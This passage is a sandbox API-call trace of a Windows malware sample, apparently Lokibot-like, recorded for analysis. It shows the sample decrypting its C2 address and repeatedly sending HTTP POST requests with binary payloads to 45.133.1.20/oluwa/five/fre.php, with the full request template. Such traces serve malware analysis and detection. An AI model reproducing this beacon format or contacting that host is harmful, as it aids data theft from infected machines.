(HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b49a0 [0218.758] GetProcessHeap () returned 0x6a0000 [0218.758] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6d7f08 [0218.761] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0218.762] wvsprintfA (in: param_1=0x6d7f08, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0218.762] GetProcessHeap () returned 0x6a0000 [0218.762] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6b5c98 [0218.762] GetProcessHeap () returned 0x6a0000 [0218.762] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d7f08 | out: hHeap=0x6a0000) returned 1 [0218.763] send (s=0x648, buf=0x6b5c98*, len=242, flags=0) returned 242 [0218.763] send (s=0x648, buf=0x6bb998*, len=159, flags=0) returned 159 [0218.763] GetProcessHeap () returned 0x6a0000 [0218.763] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c66f8 [0218.763] recv (in: s=0x648, buf=0x6c66f8, len=4048, flags=0 | out: buf=0x6c66f8*) returned 204 [0218.860] GetProcessHeap () returned 0x6a0000 [0218.860] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b5c98 | out: hHeap=0x6a0000) returned 1 [0218.861] GetProcessHeap () returned 0x6a0000 [0218.861] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0218.861] GetProcessHeap () returned 0x6a0000 [0218.862] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0218.862] GetProcessHeap () returned 0x6a0000 [0218.862] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bef48 | out: hHeap=0x6a0000) returned 1 [0218.862] closesocket (s=0x648) returned 0 [0218.863] GetProcessHeap () returned 0x6a0000 [0218.863] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baa60 | out: hHeap=0x6a0000) returned 1 [0218.863] GetProcessHeap () returned 0x6a0000 [0218.863] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0218.863] GetProcessHeap () returned 0x6a0000 [0218.864] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4be0 | out: hHeap=0x6a0000) returned 1 [0218.864] GetProcessHeap () returned 0x6a0000 [0218.864] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3490 | out: hHeap=0x6a0000) returned 1 [0218.864] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c66f8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x9c0) returned 0x648 [0218.866] Sleep (dwMilliseconds=0xea60) [0218.868] GetProcessHeap () returned 0x6a0000 [0218.868] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4910 [0218.870] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0218.871] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0218.883] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0218.883] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6beca0) returned 1 [0218.893] GetProcessHeap () returned 0x6a0000 [0218.893] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0218.894] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0218.895] CryptImportKey (in: hProv=0x6beca0, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0218.895] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0218.896] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0218.897] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0218.897] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0218.897] GetProcessHeap () returned 0x6a0000 [0218.898] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0218.899] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0218.899] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4910, pdwDataLen=0x19fcfc | out: pbData=0x6b4910, pdwDataLen=0x19fcfc) returned 1 [0218.900] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0218.903] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0218.904] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0218.904] CryptReleaseContext (hProv=0x6beca0, dwFlags=0x0) returned 1 [0218.904] GetProcessHeap () returned 0x6a0000 [0218.904] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0218.905] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0218.906] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0218.906] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0218.907] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0218.908] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0218.908] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0218.909] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0218.910] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0218.910] GetProcessHeap () returned 0x6a0000 [0218.910] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3580 [0218.910] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0218.910] GetProcessHeap () returned 0x6a0000 [0218.911] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3580 | out: hHeap=0x6a0000) returned 1 [0218.911] GetProcessHeap () returned 0x6a0000 [0218.911] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0218.914] GetProcessHeap () returned 0x6a0000 [0218.915] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0218.915] GetProcessHeap () returned 0x6a0000 [0218.915] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4be0 [0218.916] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0218.916] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0218.927] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0218.928] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6befd0) returned 1 [0218.942] GetProcessHeap () returned 0x6a0000 [0218.942] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0218.943] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0218.944] CryptImportKey (in: hProv=0x6befd0, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0218.945] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0218.948] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0218.949] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0218.949] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0218.949] GetProcessHeap () returned 0x6a0000 [0218.950] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0218.951] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0218.951] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4be0, pdwDataLen=0x19fcfc | out: pbData=0x6b4be0, pdwDataLen=0x19fcfc) returned 1 [0218.952] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0218.953] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0218.954] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0218.954] CryptReleaseContext (hProv=0x6befd0, dwFlags=0x0) returned 1 [0218.954] GetProcessHeap () returned 0x6a0000 [0218.954] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0218.955] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0218.956] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0218.959] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0218.959] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0218.960] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0218.961] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0218.961] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0218.962] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0218.962] GetProcessHeap () returned 0x6a0000 [0218.962] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0218.962] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3670*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0218.962] GetProcessHeap () returned 0x6a0000 [0218.962] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baaf0 [0218.962] socket (af=2, type=1, protocol=6) returned 0x64c [0218.963] connect (s=0x64c, name=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0218.986] FreeAddrInfoW (pAddrInfo=0x6b3670*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0218.986] GetProcessHeap () returned 0x6a0000 [0218.986] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bef48 [0218.986] GetProcessHeap () returned 0x6a0000 [0218.986] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6d7f08 [0218.987] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0218.988] wvsprintfA (in: param_1=0x6d7f08, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0218.988] GetProcessHeap () returned 0x6a0000 [0218.988] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6bd460 [0218.988] GetProcessHeap () returned 0x6a0000 [0218.989] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d7f08 | out: hHeap=0x6a0000) returned 1 [0218.991] GetProcessHeap () returned 0x6a0000 [0218.991] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4760 [0218.991] GetProcessHeap () returned 0x6a0000 [0218.991] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6d7f08 [0218.992] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0218.993] wvsprintfA (in: param_1=0x6d7f08, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0218.993] GetProcessHeap () returned 0x6a0000 [0218.993] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6b5c98 [0218.993] GetProcessHeap () returned 0x6a0000 [0218.994] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d7f08 | out: hHeap=0x6a0000) returned 1 [0218.994] send (s=0x64c, buf=0x6b5c98*, len=242, flags=0) returned 242 [0218.994] send (s=0x64c, buf=0x6bb998*, len=159, flags=0) returned 159 [0218.995] GetProcessHeap () returned 0x6a0000 [0218.995] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c66f8 [0218.995] recv (in: s=0x64c, buf=0x6c66f8, len=4048, flags=0 | out: buf=0x6c66f8*) returned 204 [0219.160] GetProcessHeap () returned 0x6a0000 [0219.161] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b5c98 | out: hHeap=0x6a0000) returned 1 [0219.161] GetProcessHeap () returned 0x6a0000 [0219.161] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0219.161] GetProcessHeap () returned 0x6a0000 [0219.161] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0219.162] GetProcessHeap () returned 0x6a0000 [0219.162] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bef48 | out: hHeap=0x6a0000) returned 1 [0219.162] closesocket (s=0x64c) returned 0 [0219.164] GetProcessHeap () returned 0x6a0000 [0219.164] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baaf0 | out: hHeap=0x6a0000) returned 1 [0219.164] GetProcessHeap () returned 0x6a0000 [0219.165] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0219.165] GetProcessHeap () returned 0x6a0000 [0219.165] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4be0 | out: hHeap=0x6a0000) returned 1 [0219.165] GetProcessHeap () returned 0x6a0000 [0219.165] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0219.166] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c66f8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0xd60) returned 0x64c [0219.180] Sleep (dwMilliseconds=0xea60) [0219.182] GetProcessHeap () returned 0x6a0000 [0219.182] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4910 [0219.183] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0219.183] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0219.197] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0219.198] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6beca0) returned 1 [0219.211] GetProcessHeap () returned 0x6a0000 [0219.211] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0219.216] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0219.230] CryptImportKey (in: hProv=0x6beca0, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad560) returned 1 [0219.231] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0219.231] CryptSetKeyParam (hKey=0x6ad560, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0219.232] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0219.235] CryptSetKeyParam (hKey=0x6ad560, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0219.235] GetProcessHeap () returned 0x6a0000 [0219.235] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0219.236] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0219.237] CryptDecrypt (in: hKey=0x6ad560, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4910, pdwDataLen=0x19fcfc | out: pbData=0x6b4910, pdwDataLen=0x19fcfc) returned 1 [0219.237] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0219.238] CryptDestroyKey (hKey=0x6ad560) returned 1 [0219.238] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0219.238] CryptReleaseContext (hProv=0x6beca0, dwFlags=0x0) returned 1 [0219.238] GetProcessHeap () returned 0x6a0000 [0219.239] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0219.239] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0219.239] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0219.240] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0219.240] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0219.241] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0219.241] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0219.242] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0219.242] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0219.242] GetProcessHeap () returned 0x6a0000 [0219.243] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0219.243] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0219.243] GetProcessHeap () returned 0x6a0000 [0219.243] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0219.244] GetProcessHeap () returned 0x6a0000 [0219.244] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0219.244] GetProcessHeap () returned 0x6a0000 [0219.244] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0219.244] GetProcessHeap () returned 0x6a0000 [0219.244] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4d48 [0219.249] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0219.250] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0219.261] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0219.261] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf058) returned 1 [0219.268] GetProcessHeap () returned 0x6a0000 [0219.268] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0219.269] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0219.269] CryptImportKey (in: hProv=0x6bf058, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0219.270] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0219.270] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0219.271] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0219.271] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0219.271] GetProcessHeap () returned 0x6a0000 [0219.272] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0219.272] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0219.273] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4d48, pdwDataLen=0x19fcfc | out: pbData=0x6b4d48, pdwDataLen=0x19fcfc) returned 1 [0219.274] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0219.274] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0219.275] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0219.275] CryptReleaseContext (hProv=0x6bf058, dwFlags=0x0) returned 1 [0219.275] GetProcessHeap () returned 0x6a0000 [0219.275] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0219.276] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0219.276] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0219.277] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0219.277] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0219.279] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0219.280] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0219.280] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0219.281] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0219.281] GetProcessHeap () returned 0x6a0000 [0219.281] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0219.281] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0219.281] GetProcessHeap () returned 0x6a0000 [0219.281] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6bab40 [0219.281] socket (af=2, type=1, protocol=6) returned 0x650 [0219.281] connect (s=0x650, name=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0219.309] FreeAddrInfoW (pAddrInfo=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0219.309] GetProcessHeap () returned 0x6a0000 [0219.309] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bf278 [0219.309] GetProcessHeap () returned 0x6a0000 [0219.309] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6d8710 [0219.310] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0219.310] wvsprintfA (in: param_1=0x6d8710, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0219.310] GetProcessHeap () returned 0x6a0000 [0219.310] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6bd460 [0219.310] GetProcessHeap () returned 0x6a0000 [0219.311] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d8710 | out: hHeap=0x6a0000) returned 1 [0219.311] GetProcessHeap () returned 0x6a0000 [0219.311] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4760 [0219.311] GetProcessHeap () returned 0x6a0000 [0219.311] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6d8710 [0219.312] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0219.312] wvsprintfA (in: param_1=0x6d8710, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0219.313] GetProcessHeap () returned 0x6a0000 [0219.313] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6b5c98 [0219.313] GetProcessHeap () returned 